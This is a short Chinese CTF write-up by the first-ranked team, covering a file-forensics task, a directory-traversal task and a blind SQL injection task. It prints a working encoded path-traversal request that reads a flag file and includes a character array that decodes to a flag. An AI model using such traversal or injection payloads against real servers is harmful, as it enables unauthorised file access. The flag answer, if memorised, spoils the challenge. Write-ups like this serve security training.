电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup ...

一、 战队信息

战队名称：20221214
战队排名：1
二、 解题过程

ctf1

用Winhex打开，末了有一串编码字符，拿去一把梭即可。

ctf2

目录穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag

ctf3

仔细观察可以看到url编码后的SQL注入语句，mid用于截取字符串，当出现welcome admin!阐明该字符正确，将正确的字符逐个写入到C脚本变量中，输出得到flag。
[code]char a[] = {102,108,97,103,123,99,49,52,50,54,53,97,53,51,98,101,99,49,56,52,56,98,102,97,99,50,100,102,100,97,51,101,54,54,55,98,99,125};        cout